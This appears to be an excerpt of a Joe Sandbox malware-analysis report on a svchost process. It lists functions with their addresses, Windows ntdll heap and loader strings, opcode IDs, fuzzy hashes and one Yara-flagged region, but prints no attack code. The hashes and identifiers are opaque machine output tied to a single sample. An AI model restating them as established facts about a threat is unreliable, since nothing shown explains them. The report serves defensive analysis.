                                                                              • API String ID: 0-3570731704
                                                                              • Opcode ID: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                                                              • Instruction ID: 6cafc36fdc16cf96f1734caedb69ab4e6aab6f98a775d083496654a5038cbf6a
                                                                              • Opcode Fuzzy Hash: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                                                              • Instruction Fuzzy Hash: 43923875E00228CFEB25CB18C981BA9B7B5BF85314F1981EBE949AB350D7349E80CF51
                                                                              Function 03A4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SsHd, xrefs: 03A4A885
                                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03A97D03
                                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03A97D39
                                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03A97D56
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                              • API String ID: 0-2905229100
                                                                              • Opcode ID: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                                                              • Instruction ID: 9e213cd229c4ac4a1af075da0219763e25527fa065368dafa9c31d95ac12252d
                                                                              • Opcode Fuzzy Hash: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                                                              • Instruction Fuzzy Hash: 93D17C76A402199BDF24CF98C9806ADF7B5FF88310F19416BE845AB352D371D951CBA0
                                                                              Function 03A43D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                                                              • Instruction ID: 022eb5a9025751643c2a21e450b86c452660aa0534101605dc41ab9c792221bf
                                                                              • Opcode Fuzzy Hash: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                                                              • Instruction Fuzzy Hash: 28E29074A00655DFDB28CF69C490BA9FBF1FF89304F1881AED849AB385D735A845CB90
                                                                              Function 03A3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                              • API String ID: 0-379654539
                                                                              • Opcode ID: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                                                              • Instruction ID: 584432be85fe13b77e3d5cf4e764cb4d7bb944404988cc87f2b08d69c3087c2e
                                                                              • Opcode Fuzzy Hash: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                                                              • Instruction Fuzzy Hash: A8C177742083969FDB11CF28C144B6AB7F4AF86704F04896FF8D69B250E739C949CB56
                                                                              Function 03A40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03A955AE
                                                                              • HEAP[%wZ]: , xrefs: 03A954D1, 03A95592
                                                                              • HEAP: , xrefs: 03A954E0, 03A955A1
                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03A954ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                              • API String ID: 0-1657114761
                                                                              • Opcode ID: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                                                              • Instruction ID: 4a064eaf1d898d18c847a18d04cc775828ad5146751f57b2763fb9dbc82507ee
                                                                              • Opcode Fuzzy Hash: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                                                              • Instruction Fuzzy Hash: CAA1E034A04205DFDB24DF28C845BBAFBF5AF95300F18866FD5968B782D734A844EB90
                                                                              Function 03A6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SXS: %s() passed the empty activation context, xrefs: 03AA21DE
                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03AA22B6
                                                                              • .Local, xrefs: 03A628D8
                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03AA21D9, 03AA22B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                              • API String ID: 0-1239276146
                                                                              • Opcode ID: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                                                              • Instruction ID: d00d9de2c67835240671e6311fa6dd06428eb94ea12ffee7cfe1f8a5815cedb7
                                                                              • Opcode Fuzzy Hash: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                                                              • Instruction Fuzzy Hash: F7A180369402299BDB24CF68DC84BA9B3B5BF58314F1949EFD848AB351D7309E84CF90
                                                                              Function 03A2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                              • API String ID: 0-2586055223
                                                                              • Opcode ID: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                                                              • Instruction ID: aa296583c16daa479120f820bc5dcb9d0a36c31c6ecbe388f68d05c407762d64
                                                                              • Opcode Fuzzy Hash: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                                                              • Instruction Fuzzy Hash: 3561E076205780AFD721EB28C944F67BBF9EF84714F08086AF9558B391D734E941CB61
                                                                              Function 03AE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                              • API String ID: 0-336120773
                                                                              • Opcode ID: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                                                              • Instruction ID: 5640fa5e1c611e059691ae399d2b88f17617e2d2565026375bfdb02ca5201fef
                                                                              • Opcode Fuzzy Hash: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                                                              • Instruction Fuzzy Hash: 6F31CB35600220EFD719EB98CD85FAAB7E8FF09764F18016BE451DB291E670EC41CA65
                                                                              Function 03A29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                              • API String ID: 0-1391187441
                                                                              • Opcode ID: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                                                              • Instruction ID: b6a9564966e3799282a2e4182c10809bb47ef469efacd18763b38071f4bfc628
                                                                              • Opcode Fuzzy Hash: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                                                              • Instruction Fuzzy Hash: D4316076A00214EFCB11EB5AC985FAFBBB9EF45B20F14405BE815AB291D770ED40CA71
                                                                              Function 03A429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03A4327D
                                                                              • HEAP[%wZ]: , xrefs: 03A43255
                                                                              • HEAP: , xrefs: 03A43264
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                              • API String ID: 0-617086771
                                                                              • Opcode ID: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                                                              • Instruction ID: b14979d86a1559113c921aa3d9c36d5cd517f9b81941745c007e2f4a2d3c5e5b
                                                                              • Opcode Fuzzy Hash: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                                                              • Instruction Fuzzy Hash: 2B929A74A042499FDF25CF68C5447AEBBF1EF89300F1884AEE899AB391D735A941CF50
                                                                              Function 03A41F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                                                              • Instruction ID: 6ea9363dd267c2726302b933c256626521b982c24f16fff8d4d22345f4f04886
                                                                              • Opcode Fuzzy Hash: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                                                              • Instruction Fuzzy Hash: A522FB70A00641AFEB26CF28C495B7AFBF5EF46704F18849BE4559B392E735E881CB50
                                                                              Function 03A40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              • Opcode ID: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                                                              • Instruction ID: 3347c6cf4e671669eb5ed9f59dc216b8eecbff1f1a6b9277a192a906454854d8
                                                                              • Opcode Fuzzy Hash: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                                                              • Instruction Fuzzy Hash: 36F1DE34A00605DFEB19DF68C980B6AF7F5FF85304F1881AAE516AB391D734E981CB90
                                                                              Function 03A31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03A31728
                                                                              • HEAP[%wZ]: , xrefs: 03A31712
                                                                              • HEAP: , xrefs: 03A31596
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                                                              • Instruction ID: 610709e2ce17c858ad566b8fec25c91aa3b42083f67f7ac14f69ba074d6f8fc5
                                                                              • Opcode Fuzzy Hash: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                                                              • Instruction Fuzzy Hash: 2EE1C070A046469FDB29EF68C491B7ABBF5AF4A300F18855FF4968B345E734E940CB50
                                                                              Function 03A3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                              • API String ID: 0-1145731471
                                                                              • Opcode ID: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                                                              • Instruction ID: 1da94759f46221035dff2fa4eafc4e17346b3cece483057297a480bc1dc9850c
                                                                              • Opcode Fuzzy Hash: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                                                              • Instruction Fuzzy Hash: F8B16A79A056449FEF25CF69C980BADB7B6EF45714F1889AFE451EB380D730A840CB60
                                                                              Function 03AB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                              • API String ID: 0-2391371766
                                                                              • Opcode ID: eb8f2a6f86563541afb02f76a6aaf210330a9d89395303243bfa9c0ed49e76c5
                                                                              • Instruction ID: 23ee4bd00c63a88fc5779ea660b2770205c6327d03870154d0e23e6c51999e3b
                                                                              • Opcode Fuzzy Hash: eb8f2a6f86563541afb02f76a6aaf210330a9d89395303243bfa9c0ed49e76c5
                                                                              • Instruction Fuzzy Hash: 03B19D79604341AFEB21DF54C980BABB7FCAB49714F15092FFA409B291D771E844CB92
                                                                              Function 03A56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $@
                                                                              • API String ID: 0-1077428164
                                                                              • Opcode ID: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                                                              • Instruction ID: 2c2a95ef37f5fc73e27ac2bd630dcec5057f28a74874ed75174b36e260d49be9
                                                                              • Opcode Fuzzy Hash: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                                                              • Instruction Fuzzy Hash: 05C27D716087419FEB25CF24C880BABBBE5AF88754F08896FF989E7250D735D804CB52
                                                                              Function 03A2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                              • API String ID: 0-2779062949
                                                                              • Opcode ID: ef7e99afa1ae6a867ff19f4e9d6456bc6a91a0ad7d7af920c152457d35af27ac
                                                                              • Instruction ID: c4276869602d242dd173edf97e8cda97989e8d72cd8941fe8613abd6a72309ce
                                                                              • Opcode Fuzzy Hash: ef7e99afa1ae6a867ff19f4e9d6456bc6a91a0ad7d7af920c152457d35af27ac
                                                                              • Instruction Fuzzy Hash: 7FA18C759012299BDB31EF24CD88BEAF7B8EF44710F1405EAE909AB250D7359E85CF60
                                                                              Function 03AC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                              • API String ID: 0-318774311
                                                                              • Opcode ID: 8adc1c9c8dbb606dc6484b402da17b3f83216242941387013c22e090524ddfcf
                                                                              • Instruction ID: ed5dfdd812346fdbc2f1b0aa39f5ab6ff36f9d0dfcfad91f7de8a22f3d420e0b
                                                                              • Opcode Fuzzy Hash: 8adc1c9c8dbb606dc6484b402da17b3f83216242941387013c22e090524ddfcf
                                                                              • Instruction Fuzzy Hash: 81818E79618380AFDB11DB14C984B6AB7E8FF85750F08892EF9909B3D0D778D904CB52
                                                                              Function 03A6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %$&$@
                                                                              • API String ID: 0-1537733988
                                                                              • Opcode ID: 83ca95458df1b92bf84ba17eab3df040423cf43eae41263482d164b6a585f6d8
                                                                              • Instruction ID: daa09888330b133a13fbe6ec16afb9d69a637325e55ccae17112f64fbf2504e3
                                                                              • Opcode Fuzzy Hash: 83ca95458df1b92bf84ba17eab3df040423cf43eae41263482d164b6a585f6d8
                                                                              • Instruction Fuzzy Hash: 0071D1705087019FC754DF24CA84A2BFBE9FF85618F144A1FE4AA8B290D730D905CB96
                                                                              Function 03B0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03B0B82A
                                                                              • GlobalizationUserSettings, xrefs: 03B0B834
                                                                              • TargetNtPath, xrefs: 03B0B82F
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                              • API String ID: 0-505981995
                                                                              • Opcode ID: 15636f226af721803e43a3b71052b6dc90aeef50f55a95cf54d8f7be59142851
                                                                              • Instruction ID: f8ac4c2abfb6c65be880654ea99514b9fe64b38722deef5a26e131334f0ca0b7
                                                                              • Opcode Fuzzy Hash: 15636f226af721803e43a3b71052b6dc90aeef50f55a95cf54d8f7be59142851
                                                                              • Instruction Fuzzy Hash: A6617F76D41229ABDB21DF54DC88B9ABBB8EF04714F0101E5A508AB390DB74DE84CF90
                                                                              Function 004010D3 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff$gfff$q
                                                                              • API String ID: 0-1272973491
                                                                              • Opcode ID: 9a697ed8a4d1acd69a14ec21015b18f02ba18013c69f9d226dcf790d7fb4a876
                                                                              • Instruction ID: aece826f52c482b9cea20f7c878199675417686b53cf3370e1d0dbd136eb48b2
                                                                              • Opcode Fuzzy Hash: 9a697ed8a4d1acd69a14ec21015b18f02ba18013c69f9d226dcf790d7fb4a876
                                                                              • Instruction Fuzzy Hash: 19511932B0005507DB2C891DDCA16AA6297E7E8315F28823FE95BEF7F0E93DAD414684
                                                                              Function 03A2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03A8E6C6
                                                                              • HEAP[%wZ]: , xrefs: 03A8E6A6
                                                                              • HEAP: , xrefs: 03A8E6B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                              • API String ID: 0-1340214556
                                                                              • Opcode ID: 4d3bd3db839c50ff4c947501fc33054a2151778eeb5004cd27629cb3fbadbb33
                                                                              • Instruction ID: 036c4df1b96919cc5b212d43e1c54dd64e74265abfca75975e59e93e7f8505a5
                                                                              • Opcode Fuzzy Hash: 4d3bd3db839c50ff4c947501fc33054a2151778eeb5004cd27629cb3fbadbb33
                                                                              • Instruction Fuzzy Hash: FF51C135604794EFD712EB68C944FAAFBF8EF05300F0845A6E9518B792D774E950CB20
                                                                              Function 03ADDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • HEAP[%wZ]: , xrefs: 03ADDC12
                                                                              • HEAP: , xrefs: 03ADDC1F
                                                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03ADDC32
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                              • API String ID: 0-3815128232
                                                                              • Opcode ID: 0a60b769703dbbd0552a47eb6e7800b8a31878e67183ace78e2219ebf167883d
                                                                              • Instruction ID: 8f12bc6512ad7c7b5b96af41c0907455de36936ffaef0503e1be773aac742157
                                                                              • Opcode Fuzzy Hash: 0a60b769703dbbd0552a47eb6e7800b8a31878e67183ace78e2219ebf167883d
                                                                              • Instruction Fuzzy Hash: B15122352046508EE374DB2EC848772B7F2EF45648F08888FE4D38F685D276E846DB21
                                                                              Function 03A6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03AA82E8
                                                                              • Failed to reallocate the system dirs string !, xrefs: 03AA82D7
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 03AA82DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1783798831
                                                                              • Opcode ID: 750bab00a3f7310cacd02f77dacd9aae5ae8c269e47c5f6976a2867153646bd6
                                                                              • Instruction ID: 2658679e4dca39bd962dd5367f5f5476536a5f439d4463705aadd68dadff5faa
                                                                              • Opcode Fuzzy Hash: 750bab00a3f7310cacd02f77dacd9aae5ae8c269e47c5f6976a2867153646bd6
                                                                              • Instruction Fuzzy Hash: 3A41F3B6944310ABC721EB68DA44B5B7BE8FF49764F044A2BF988D7250E774D8108B91
                                                                              Function 03A616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 03AA1B4A
                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03AA1B39
                                                                              • LdrpAllocateTls, xrefs: 03AA1B40
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-4274184382
                                                                              • Opcode ID: 5dce3385c75fc70b85e5e0466c9316018fecc1f53ead84e4fb7967415fe17fb7
                                                                              • Instruction ID: a61f9d262b8ab5298d84ca0675ea41bac60394a64342d3c4f7b09d47edaecf1a
                                                                              • Opcode Fuzzy Hash: 5dce3385c75fc70b85e5e0466c9316018fecc1f53ead84e4fb7967415fe17fb7
                                                                              • Instruction Fuzzy Hash: 1541587AA00608AFCB25DFA8C941BAEFBF5FF49714F14811AE405AB350D775A800CF90
                                                                              Function 03AEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03AEC1C5
                                                                              • PreferredUILanguages, xrefs: 03AEC212
                                                                              • @, xrefs: 03AEC1F1
